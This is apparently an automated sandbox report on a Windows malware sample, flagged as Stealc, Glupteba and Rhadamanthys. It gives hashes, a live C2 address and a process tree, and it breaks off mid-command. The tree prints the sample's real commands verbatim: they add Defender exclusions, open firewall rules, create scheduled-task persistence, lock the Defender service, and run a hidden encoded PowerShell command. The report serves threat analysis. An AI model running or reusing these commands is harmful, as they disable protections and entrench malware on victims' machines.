Resubmissions

10-12-2023 03:30

231210-d2s39adde2 10

10-12-2023 01:32

231210-bx3e1sbcfq 10

10-12-2023 01:04

231210-be3casbbcn 10

Analysis

  • max time kernel
    150s
  • max time network
    155s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20231127-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20231127-enlocale:en-usos:windows10-2004-x64system
  • submitted
    10-12-2023 01:04

General

  • Target

    file.exe

  • Size

    1.1MB

  • MD5

    f0b0a5f64dcfc3cbc85b115928903074

  • SHA1

    d77ad5345ea489673f4e00e892caa81f92aec7c1

  • SHA256

    0acc5eca8860dc87070e066f3258296228439b35bdb9fbc02185fc861a97475f

  • SHA512

    cbee9df095fd51e7b9a8c6ed69bff51b78c34ae6d87c85cd45bb8daa5378689914f29d73ecec0bdc0546167e2acc2e93eb630884a19397c655128b0e65fdccb9

  • SSDEEP

    24576:/JuwYk1FDiCaItlrzZNkSqVLHX4gG6WCepxaKpo:/AzqraItV3CD4gG6Xe1po

Malware Config

Extracted

Family

stealc

C2

http://77.91.76.36

Attributes
  • url_path

    /3886d2276f6914c4.php

rc4.plain

Signatures

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba payload 9 IoCs
  • Rhadamanthys

    Rhadamanthys is an info stealer written in C++ first seen in August 2022.

  • Stealc

    Stealc is an infostealer written in C++.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • UAC bypass 3 TTPs 1 IoCs
  • Windows security bypass 2 TTPs 2 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Downloads MZ/PE file
  • Modifies Windows Firewall 1 TTPs 1 IoCs
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 4 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 6 IoCs
  • Executes dropped EXE 23 IoCs
  • Loads dropped DLL 16 IoCs
  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • UPX packed file 15 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Windows security modification 2 TTPs 3 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 2 IoCs
  • Drops Chrome extension 2 IoCs
  • Drops desktop.ini file(s) 1 IoCs
  • Enumerates connected drives 3 TTPs 4 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Manipulates WinMonFS driver. 1 IoCs

    Roottkits write to WinMonFS to hide directories/files from being detected.

  • Drops file in System32 directory 35 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 1 IoCs

    Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.

  • Drops file in Program Files directory 14 IoCs
  • Drops file in Windows directory 8 IoCs
  • Launches sc.exe 1 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 3 IoCs
  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 13 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 1 IoCs
  • Enumerates system info in registry 2 TTPs 4 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies system certificate store 2 TTPs 5 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 18 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • System policy modification 1 TTPs 1 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\system32\sihost.exe
    sihost.exe
    1⤵
      PID:2728
      • C:\Windows\SysWOW64\dialer.exe
        "C:\Windows\system32\dialer.exe"
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        PID:208
    • C:\Users\Admin\AppData\Local\Temp\file.exe
      "C:\Users\Admin\AppData\Local\Temp\file.exe"
      1⤵
      • UAC bypass
      • Windows security bypass
      • Checks computer location settings
      • Windows security modification
      • Checks whether UAC is enabled
      • Suspicious use of SetThreadContext
      • Suspicious use of WriteProcessMemory
      • System policy modification
      PID:3892
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\file.exe" -Force
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4636
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
        2⤵
        • Drops startup file
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1944
        • C:\Users\Admin\Pictures\r6EiFBnUgUgtBuEzSUMcLXn3.exe
          "C:\Users\Admin\Pictures\r6EiFBnUgUgtBuEzSUMcLXn3.exe"
          3⤵
          • Executes dropped EXE
          • Suspicious use of SetThreadContext
          • Suspicious use of WriteProcessMemory
          PID:3704
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
            4⤵
            • Suspicious use of NtCreateUserProcessOtherParentProcess
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:2896
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 2896 -s 444
              5⤵
              • Program crash
              PID:4660
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 2896 -s 468
              5⤵
              • Program crash
              PID:1580
        • C:\Users\Admin\Pictures\2KGwrn4Ui3m3Gih6VVtVPIzx.exe
          "C:\Users\Admin\Pictures\2KGwrn4Ui3m3Gih6VVtVPIzx.exe"
          3⤵
          • Executes dropped EXE
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:4920
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell -nologo -noprofile
            4⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:3844
          • C:\Users\Admin\Pictures\2KGwrn4Ui3m3Gih6VVtVPIzx.exe
            "C:\Users\Admin\Pictures\2KGwrn4Ui3m3Gih6VVtVPIzx.exe"
            4⤵
            • Executes dropped EXE
            • Adds Run key to start application
            • Checks for VirtualBox DLLs, possible anti-VM trick
            • Drops file in Windows directory
            • Modifies data under HKEY_USERS
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:3288
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              powershell -nologo -noprofile
              5⤵
              • Drops file in System32 directory
              • Modifies data under HKEY_USERS
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:2856
            • C:\Windows\system32\cmd.exe
              C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
              5⤵
              • Suspicious use of WriteProcessMemory
              PID:4132
              • C:\Windows\system32\netsh.exe
                netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
                6⤵
                • Modifies Windows Firewall
                PID:3008
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              powershell -nologo -noprofile
              5⤵
              • Drops file in System32 directory
              • Modifies data under HKEY_USERS
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:4136
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              powershell -nologo -noprofile
              5⤵
              • Drops file in System32 directory
              • Modifies data under HKEY_USERS
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:1188
            • C:\Windows\rss\csrss.exe
              C:\Windows\rss\csrss.exe
              5⤵
              • Executes dropped EXE
              • Adds Run key to start application
              • Manipulates WinMonFS driver.
              • Drops file in Windows directory
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:3968
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                powershell -nologo -noprofile
                6⤵
                • Drops file in System32 directory
                • Modifies data under HKEY_USERS
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:4356
              • C:\Windows\SYSTEM32\schtasks.exe
                schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
                6⤵
                • Creates scheduled task(s)
                PID:1140
              • C:\Windows\SYSTEM32\schtasks.exe
                schtasks /delete /tn ScheduledUpdate /f
                6⤵
                  PID:2212
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  powershell -nologo -noprofile
                  6⤵
                    PID:2028
                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    powershell -nologo -noprofile
                    6⤵
                      PID:2472
                    • C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
                      C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
                      6⤵
                      • Executes dropped EXE
                      • Drops file in System32 directory
                      • Modifies data under HKEY_USERS
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      PID:2472
                    • C:\Windows\SYSTEM32\schtasks.exe
                      schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
                      6⤵
                      • Creates scheduled task(s)
                      PID:456
                    • C:\Windows\windefender.exe
                      "C:\Windows\windefender.exe"
                      6⤵
                      • Executes dropped EXE
                      PID:2000
                      • C:\Windows\SysWOW64\cmd.exe
                        cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
                        7⤵
                          PID:2792
                          • C:\Windows\SysWOW64\sc.exe
                            sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
                            8⤵
                            • Launches sc.exe
                            • Suspicious use of AdjustPrivilegeToken
                            PID:4320
                • C:\Users\Admin\Pictures\23QhEVQNOVH6t9YhKgfHHzUg.exe
                  "C:\Users\Admin\Pictures\23QhEVQNOVH6t9YhKgfHHzUg.exe"
                  3⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • Suspicious use of WriteProcessMemory
                  PID:1688
                  • C:\Users\Admin\AppData\Local\Temp\Broom.exe
                    C:\Users\Admin\AppData\Local\Temp\Broom.exe
                    4⤵
                    • Executes dropped EXE
                    • Suspicious use of SetWindowsHookEx
                    PID:2932
                  • C:\Users\Admin\AppData\Local\Temp\nszC382.tmp.exe
                    C:\Users\Admin\AppData\Local\Temp\nszC382.tmp.exe
                    4⤵
                    • Checks computer location settings
                    • Executes dropped EXE
                    • Loads dropped DLL
                    • Checks processor information in registry
                    • Suspicious behavior: EnumeratesProcesses
                    PID:396
                    • C:\Windows\SysWOW64\cmd.exe
                      "C:\Windows\system32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\Admin\AppData\Local\Temp\nszC382.tmp.exe" & del "C:\ProgramData\*.dll"" & exit
                      5⤵
                        PID:5312
                        • C:\Windows\SysWOW64\timeout.exe
                          timeout /t 5
                          6⤵
                          • Delays execution with timeout.exe
                          PID:4444
                      • C:\Windows\SysWOW64\WerFault.exe
                        C:\Windows\SysWOW64\WerFault.exe -u -p 396 -s 2300
                        5⤵
                        • Program crash
                        PID:5360
                  • C:\Users\Admin\Pictures\0gFoZKEIdIwvgqSuNTrBEAcO.exe
                    "C:\Users\Admin\Pictures\0gFoZKEIdIwvgqSuNTrBEAcO.exe"
                    3⤵
                    • Executes dropped EXE
                    • Suspicious use of WriteProcessMemory
                    PID:5080
                    • C:\Users\Admin\AppData\Local\Temp\7zSDDFC.tmp\Install.exe
                      .\Install.exe
                      4⤵
                      • Executes dropped EXE
                      • Suspicious use of WriteProcessMemory
                      PID:3380
                      • C:\Users\Admin\AppData\Local\Temp\7zSE07D.tmp\Install.exe
                        .\Install.exe /mPdidlcN "385118" /S
                        5⤵
                        • Checks BIOS information in registry
                        • Checks computer location settings
                        • Executes dropped EXE
                        • Drops file in System32 directory
                        • Enumerates system info in registry
                        PID:4612
                        • C:\Windows\SysWOW64\forfiles.exe
                          "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
                          6⤵
                            PID:4540
                            • C:\Windows\SysWOW64\cmd.exe
                              /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
                              7⤵
                                PID:3020
                                • \??\c:\windows\SysWOW64\reg.exe
                                  REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
                                  8⤵
                                    PID:416
                                  • \??\c:\windows\SysWOW64\reg.exe
                                    REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
                                    8⤵
                                      PID:3964
                                • C:\Windows\SysWOW64\forfiles.exe
                                  "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
                                  6⤵
                                    PID:4436
                                    • C:\Windows\SysWOW64\cmd.exe
                                      /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
                                      7⤵
                                        PID:4580
                                        • \??\c:\windows\SysWOW64\reg.exe
                                          REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
                                          8⤵
                                            PID:4176
                                          • \??\c:\windows\SysWOW64\reg.exe
                                            REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
                                            8⤵
                                              PID:4144
                                        • C:\Windows\SysWOW64\schtasks.exe
                                          schtasks /CREATE /TN "gljuhFaQb" /SC once /ST 00:26:53 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                          6⤵
                                          • Creates scheduled task(s)
                                          PID:3968
                                        • C:\Windows\SysWOW64\schtasks.exe
                                          schtasks /run /I /tn "gljuhFaQb"
                                          6⤵
                                            PID:3020
                                          • C:\Windows\SysWOW64\schtasks.exe
                                            schtasks /DELETE /F /TN "gljuhFaQb"
                                            6⤵
                                              PID:5040
                                              • C:\Windows\System32\Conhost.exe
                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                7⤵
                                                  PID:3020
                                              • C:\Windows\SysWOW64\schtasks.exe
                                                schtasks /CREATE /TN "bEyYKbsuUozdEyKwWq" /SC once /ST 01:06:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\ZhTQaFaBDmtyfHbtF\rWZwyvlULFiFahc\CrPaxwR.exe\" vP /Qlsite_idYSD 385118 /S" /V1 /F
                                                6⤵
                                                • Drops file in System32 directory
                                                • Drops file in Windows directory
                                                • Creates scheduled task(s)
                                                • Modifies data under HKEY_USERS
                                                • Suspicious behavior: EnumeratesProcesses
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:2028
                                        • C:\Users\Admin\Pictures\qTXnyDM1oGf47tHPkFna2dgZ.exe
                                          "C:\Users\Admin\Pictures\qTXnyDM1oGf47tHPkFna2dgZ.exe" --silent --allusers=0
                                          3⤵
                                          • Executes dropped EXE
                                          • Loads dropped DLL
                                          • Enumerates connected drives
                                          • Modifies system certificate store
                                          PID:3388
                                          • C:\Users\Admin\Pictures\qTXnyDM1oGf47tHPkFna2dgZ.exe
                                            C:\Users\Admin\Pictures\qTXnyDM1oGf47tHPkFna2dgZ.exe --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=105.0.4970.34 --initial-client-data=0x2f0,0x2f4,0x2f8,0x2cc,0x2fc,0x6ea174f0,0x6ea17500,0x6ea1750c
                                            4⤵
                                            • Executes dropped EXE
                                            • Loads dropped DLL
                                            PID:540
                                          • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\qTXnyDM1oGf47tHPkFna2dgZ.exe
                                            "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\qTXnyDM1oGf47tHPkFna2dgZ.exe" --version
                                            4⤵
                                            • Executes dropped EXE
                                            • Loads dropped DLL
                                            PID:2956
                                          • C:\Users\Admin\Pictures\qTXnyDM1oGf47tHPkFna2dgZ.exe
                                            "C:\Users\Admin\Pictures\qTXnyDM1oGf47tHPkFna2dgZ.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --installfolder="C:\Users\Admin\AppData\Local\Programs\Opera" --profile-folder --language=en --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=1 --run-at-startup=1 --show-intro-overlay --server-tracking-data=server_tracking_data --initial-pid=3388 --package-dir-prefix="C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_20231210010522" --session-guid=d0f0b514-df00-45ae-a994-54f316137108 --server-tracking-blob=YzNjYjk0N2I1ZjI0YjA1NDU5YThmYjdhNzEwZjQwNjE5MWM1MGZmNWQ4OWQyYmYzMGViYjVjZjhhNzE1M2NhODp7ImNvdW50cnkiOiJHQiIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijp7Im5hbWUiOiJvcGVyYSJ9LCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cy8/dXRtX21lZGl1bT1hcGImdXRtX3NvdXJjZT1ta3QmdXRtX2NhbXBhaWduPTc2NyIsInN5c3RlbSI6eyJwbGF0Zm9ybSI6eyJhcmNoIjoieDg2XzY0Iiwib3BzeXMiOiJXaW5kb3dzIiwib3BzeXMtdmVyc2lvbiI6IjEwIiwicGFja2FnZSI6IkVYRSJ9fSwidGltZXN0YW1wIjoiMTcwMjE3MDI3Mi4wMTYyIiwidXRtIjp7ImNhbXBhaWduIjoiNzY3IiwibWVkaXVtIjoiYXBiIiwic291cmNlIjoibWt0In0sInV1aWQiOiI5M2I2N2RjZC1mYzk2LTRlZmMtOWZlYi1lYjNhYTc0MmJjNjQifQ== --silent --desktopshortcut=1 --wait-for-package --initial-proc-handle=B005000000000000
                                            4⤵
                                            • Executes dropped EXE
                                            • Loads dropped DLL
                                            • Enumerates connected drives
                                            PID:5152
                                            • C:\Users\Admin\Pictures\qTXnyDM1oGf47tHPkFna2dgZ.exe
                                              C:\Users\Admin\Pictures\qTXnyDM1oGf47tHPkFna2dgZ.exe --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=105.0.4970.34 --initial-client-data=0x2e0,0x2e4,0x2e8,0x2bc,0x2ec,0x6e0b74f0,0x6e0b7500,0x6e0b750c
                                              5⤵
                                              • Executes dropped EXE
                                              • Loads dropped DLL
                                              PID:5204
                                          • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202312100105221\assistant\Assistant_103.0.4928.25_Setup.exe_sfx.exe
                                            "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202312100105221\assistant\Assistant_103.0.4928.25_Setup.exe_sfx.exe"
                                            4⤵
                                            • Executes dropped EXE
                                            PID:5768
                                          • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202312100105221\assistant\assistant_installer.exe
                                            "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202312100105221\assistant\assistant_installer.exe" --version
                                            4⤵
                                            • Executes dropped EXE
                                            • Loads dropped DLL
                                            PID:5872
                                            • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202312100105221\assistant\assistant_installer.exe
                                              "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202312100105221\assistant\assistant_installer.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=103.0.4928.25 --initial-client-data=0x268,0x26c,0x270,0x244,0x274,0xf01588,0xf01598,0xf015a4
                                              5⤵
                                              • Executes dropped EXE
                                              • Loads dropped DLL
                                              PID:5916
                                    • C:\Windows\SysWOW64\WerFault.exe
                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 2896 -ip 2896
                                      1⤵
                                        PID:332
                                      • C:\Windows\SysWOW64\WerFault.exe
                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 2896 -ip 2896
                                        1⤵
                                          PID:3436
                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                          C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                          1⤵
                                          • Suspicious behavior: EnumeratesProcesses
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:3972
                                          • C:\Windows\system32\gpupdate.exe
                                            "C:\Windows\system32\gpupdate.exe" /force
                                            2⤵
                                              PID:2904
                                          • C:\Windows\system32\svchost.exe
                                            C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
                                            1⤵
                                              PID:4444
                                            • C:\Windows\system32\svchost.exe
                                              C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                                              1⤵
                                                PID:1644
                                              • C:\Windows\system32\gpscript.exe
                                                gpscript.exe /RefreshSystemParam
                                                1⤵
                                                  PID:3672
                                                • C:\Windows\windefender.exe
                                                  C:\Windows\windefender.exe
                                                  1⤵
                                                  • Executes dropped EXE
                                                  • Modifies data under HKEY_USERS
                                                  PID:3108
                                                • C:\Windows\SysWOW64\WerFault.exe
                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 396 -ip 396
                                                  1⤵
                                                    PID:5296
                                                  • C:\Users\Admin\AppData\Local\Temp\ZhTQaFaBDmtyfHbtF\rWZwyvlULFiFahc\CrPaxwR.exe
                                                    C:\Users\Admin\AppData\Local\Temp\ZhTQaFaBDmtyfHbtF\rWZwyvlULFiFahc\CrPaxwR.exe vP /Qlsite_idYSD 385118 /S
                                                    1⤵
                                                    • Executes dropped EXE
                                                    • Drops file in System32 directory
                                                    PID:3680
                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 